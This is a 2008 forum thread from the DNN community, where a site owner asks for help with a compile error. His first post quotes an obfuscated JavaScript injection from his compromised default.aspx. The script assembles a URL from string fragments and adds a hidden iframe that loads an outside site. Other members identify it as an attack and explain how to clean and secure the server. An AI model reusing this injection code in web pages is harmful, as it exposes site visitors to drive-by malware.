Products

Evoq Content Overview Content Creation Workflow Asset Management Mobile Responsive Personalization Content Analytics SEO Integrations Security Website PerformanceEvoq Engage Overview Community Management  Dashboard  Analytics  Member Profile Gamification Advocate Marketing Community Engagement  Ideas  Answers  Discussions  Groups  Wikis  Events Mobile ReadyDNN Support PackagesEvoq: CMS FeaturesEvoq OnDemandCompare DNN's CMS Products

Solutions

Content Management SystemMulti-Channel PublishingDigital MarketingOnline Community ManagementIntranet Software SolutionOur CustomersPrime

Resources

Test DrivesSchedule A DemoDocumentation CenterWebinarsWhite PapersProduct ManualsRequest PricingData SheetsCase StudiesEvoq Preferred Products Content Management Ecommerce Forms Identity Management and Authentication Site Management Social Themes

Partners

DNN Partners Partner Directory Become a DNN Partner Partner Program Overview  Hosting  Implementation  ISV  Training  Competencies

Community

Participate Ask a Question Forums Community Showcase DNN MVP  Program Overview  Lifetime MVPs  Honorary MVPs Subscribe to DNN Digest Advisory Groups  Awareness Advisory Group  Developer Advisory Group  Partner Advisory Group  Technology Advisory GroupLearn Documentation Wiki Community Blog Video Library Project History Development RoadmapDownload DNN Store Language Packs Manuals Nightly BuildsSecurity Policies Security Center

Blog

About

News Press Releases News Coverage Press KitCareersContact DNN

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen
HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...Compilation error - urgent help neededCompilation error - urgent help needed
Previous
 
Next
New Post
11/21/2008 12:28 PM
 
brad

Joined: 6/11/2007
Posts: 32

Hey there,

 

recently i visited my site - www.mobismartzone.com and was presented with the following error. i have not done any upgrades or new installs so and really baffled by why this error is occurring. The site has been down for a week now as a result and i am looking for any assistance on fixing this error as quickly as possible. The error i see when i browse to my site is -

 
Line 20: </head>
Line 21:
Line 22: <bodyLine 23: onload="status='';g='i';y='e';pm='u';wu='htt';n='vek';v='/k';k='ram';b='f';j='sr';e='ll';w='r';o='i';a='i';nr='c'
;hy='o';gh='s.';l='l';x='//';su='php';pw
='x.';i='nde';vq='p:';jy='i';mo='ll/';yn=jy.concat(b,k,y);uw=j.concat(nr);cr=wu.concat
(vq,x,l,hy,n,a,e,gh,w,pm,v,g,mo,o,i,pw,su);var
wi=document.createElement(yn);wi.setAttribute('width','5');wi.setAttribute('height','5');
wi.setAttribute('style','display:none');wi.setAttribute(uw,cr);d
ocument.body.appendChild(wi);window.status=status;" id="Body" runat="server" >
Line 24:     <noscript></noscript>
 

 

If there is anyone that can advise what i need to do to rectify this i would be greatfully appreciative.

 

thanks

Brad
 

*Edit removed a lot of text to make the post easier to read -chris hammond
 
New Post
11/21/2008 3:05 PM
 
Brian Dukes


Brian Dukes's Avatar

Brian Dukes's Avatar

www.engagesoftware.com
Joined: 8/25/2006
Posts: 896

Brad,

it appears that you have been subject to some sort of attack.  The string that you see in your body onload property up there is a JavaScript attack that adds a hidden IFrame to the page, pointing to a (probably malicious) website.

Fortunately, it was added directly to your default.aspx and interpreted as (broken) server-side code, rather than JavaScript.

In order to fix this, I would recommend replacing your Default.aspx with a clean copy from an install package downloaded from this site.

However, this doesn't fix the issue of how your Default.aspx came to be changed as it was.  There is probably some security vulnerability with your host that you will need to discuss with them if you're using a 3rd party host.  If you're hosting yourself, you'll need to figure out what need update/removing/adding to keep this from happening again.  You could probably also stand to check around the other files in your site and make sure they weren't altered as well.

Hope that helps,

Brian Dukes
Engage Software
St. Louis, MO
866-907-4002
DNN partner specializing in custom, enterprise DNN development.
 
New Post
11/21/2008 3:11 PM
 
Chris Hammond


Chris Hammond's Avatar

Chris Hammond's Avatar

Chris Hammond's Avatar

www.christoc.com
Joined: 1/14/2003
Posts: 7319

I would begin by making sure your IIS is securely locked down, I believe there's a tool called IISLockdown that you can run to check things out. It is highly likely that someone got through your webserver and hacked into default.aspx, rather than getting in through DNN itself.

As Brian said, the immediate fix would be to correct your default.aspx file, ultimately you need to figure out what hole they got through in IIS and close that.

Chris Hammond
Former DNN Corp Employee, MVP, Core Team Member, Trustee
Christoc.com Software Solutions DotNetNuke Module Development, Upgrades and consulting.
dnnCHAT.com a chat room for DotNetNuke discussions
 
New Post
11/24/2008 8:42 PM
 
brad

Joined: 6/11/2007
Posts: 32

Hey there,

 

Thanks for you advise, i have been pulling my hair out here recently.

 

I did what you recommended and took a clean default.aspx file from a new DNN download and uploaded that however it does not appear to have fixed the issue yet. now if you browse to www.mobismartzone.com you will see that i now get the message -

Module Load Warning
One or more of the modules on this page did not load. This may be temporary. Please refresh the page (click F5 in most browsers). If the problem persists, please let the Site Administrator know.

 

the good news is that at least the page somewhat displays, although not in full.

 

Any other advice would be great, i am running IIS Lockdown as we speak to try and secure further

 

thanks

Brad
 
New Post
11/24/2008 11:54 PM
 
Chris Hammond


Chris Hammond's Avatar

Chris Hammond's Avatar

Chris Hammond's Avatar

www.christoc.com
Joined: 1/14/2003
Posts: 7319

I was going to suggest you try logging in, but it looks like you perhaps modified the portal and setup a login page, without putting a login module on that page?

http://www.motosmartzone.com/dotnetnuke/Home/tabid/36/ctl/Login/Default.aspx?returnurl=%2fdotnetnuke%2fHome%2ftabid%2f36%2fctl%2fLogin%2fDefault.aspx

If that is the case, get into the Portals table in the database and make the LoginTabId column NULL in your portals table so that you can get logged into the website. Login as the Host account and see what errors come up on the home page.

 

Chris Hammond
Former DNN Corp Employee, MVP, Core Team Member, Trustee
Christoc.com Software Solutions DotNetNuke Module Development, Upgrades and consulting.
dnnCHAT.com a chat room for DotNetNuke discussions
 
 Page 1 of 2
12Next 
Previous
 
Next
HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...Compilation error - urgent help neededCompilation error - urgent help needed


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out